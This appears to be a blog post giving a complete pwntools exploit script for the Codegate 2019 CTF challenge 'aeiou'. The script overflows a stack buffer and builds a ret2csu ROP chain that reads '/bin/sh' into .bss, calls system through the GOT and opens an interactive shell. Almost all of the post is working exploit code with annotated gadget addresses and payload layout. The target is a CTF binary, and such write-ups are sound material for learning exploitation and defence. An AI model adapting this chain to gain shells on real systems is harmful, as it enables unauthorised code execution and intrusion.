
Codegate 2019 CTF aeiou

JeonYoungSin 2019. 7. 30. 02:08
exploit.py (Python 2 / pwntools; the payload is built as `str`, so a Python 3 port needs bytes literals)

from pwn import *
  
# ELF metadata for the target: GOT slots and the .bss address used by the chain.
e = ELF("./aeiou")
# libc object pwntools resolves for the binary; the chain below never uses it
# (ret2csu only needs the binary's own GOT), so this binding is dead.
l = e.libc
# Local instance of the vulnerable binary.
p = process("./aeiou")


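def csu_chain(addr, argv1, argv2, argv3, mode=1):
    """Build one ret2csu frame for the __libc_csu_init gadget pair csu_1/csu_2.

    csu_1 pops rbx, rbp, r12, r13, r14, r15 and returns into csu_2, which moves
    r13/r14/r15 into the third/second/first argument registers and executes
    ``call [r12 + rbx*8]`` (the standard __libc_csu_init layout; the 0x1A-byte
    gap between csu_2 and csu_1 matches it -- confirm against the disassembly).
    rbx=0 and rbp=1 make the gadget's loop counter compare equal after a single
    call, so it falls through ``add rsp, 8`` back into the pop sequence and the
    next frame on the stack is consumed.

    Args:
        addr:  address of a *pointer* to the function to call (a GOT slot);
               the gadget dereferences it, it does not call addr itself.
        argv1: first argument (rdi).  The gadget loads it with ``mov edi, r15d``,
               so only the low 32 bits reach the callee; values that do not fit
               are rejected instead of silently truncated.
        argv2: second argument (rsi).
        argv3: third argument (rdx).
        mode:  0 for the frame that sits directly after csu_1's address on the
               stack; any non-zero value for every later frame, which must
               carry 8 filler bytes for the gadget's ``add rsp, 8`` to skip.

    Returns:
        The frame as bytes (``str`` on Python 2): six popped register values
        followed by the csu_2 return address (56 bytes), plus 8 filler bytes
        when mode is non-zero.

    Raises:
        ValueError: if argv1 does not fit in 32 bits.
    """
    if not 0 <= argv1 <= 0xFFFFFFFF:
        raise ValueError("argv1 must fit in 32 bits (edi), got %#x" % argv1)
    # Values in pop order: rbx, rbp, r12, r13, r14, r15, then the ret target.
    regs = [0, 1, addr, argv3, argv2, argv1, csu_2]
    frame = b"".join(p64(v) for v in regs)
    # Slot eaten by `add rsp, 8` before the pops of every frame but the first.
    filler = b"A" * 8 if mode != 0 else b""
    return filler + frame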

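# All gadget addresses are absolute 0x40xxxx values, so the binary is presumably
# non-PIE; that is also what lets e.bss() serve as a fixed, writable scratch address.
binsh = b"/bin/sh\x00"
csu_1 = 0x4026EA  # __libc_csu_init tail: pop rbx, rbp, r12, r13, r14, r15; ret
csu_2 = 0x4026D0  # __libc_csu_init: mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+rbx*8]
ret = 0x400b29    # presumably a bare `ret`; keeps rsp 16-byte aligned for system() (movaps)

# 0x1018 bytes of filler reach the saved return address.  This only works if no
# stack canary sits between the buffer and the saved rip, since it is all 'A's.
payload = b"A" * 0x1018
payload += p64(ret)
payload += p64(csu_1)
# Stage 1: read(0, .bss, 8) pulls "/bin/sh\0" into memory at a known address.
# mode=0: this frame is popped directly by csu_1, no filler slot in front.
payload += csu_chain(e.got['read'], 0, e.bss(), len(binsh), 0)
# Stage 2: system(.bss) via the binary's own GOT slot -- requires the binary to
# import system(); no libc leak is needed anywhere in this chain.
payload += csu_chain(e.got['system'], e.bss(), 0, 0)
# Tail padding up to the 6224 bytes reported to the target below.  Despite the
# name this is NOT a stack canary value, just filler.
canary = b"A" * (6224 - len(payload))
payload += canary

p.sendlineafter(">>", "3")
p.sendlineafter("number!\n", str(len(payload)))
# sendline appends '\n'.  If the target read()s exactly len(payload) bytes, that
# newline stays in stdin and becomes the first byte of the stage-1 read into
# .bss ("\n/bin/sh"); sh still executes that, but p.send(payload) would keep the
# buffer clean -- TODO confirm how the target consumes its input.
p.sendline(payload)
p.sendline(binsh)
p.interactive()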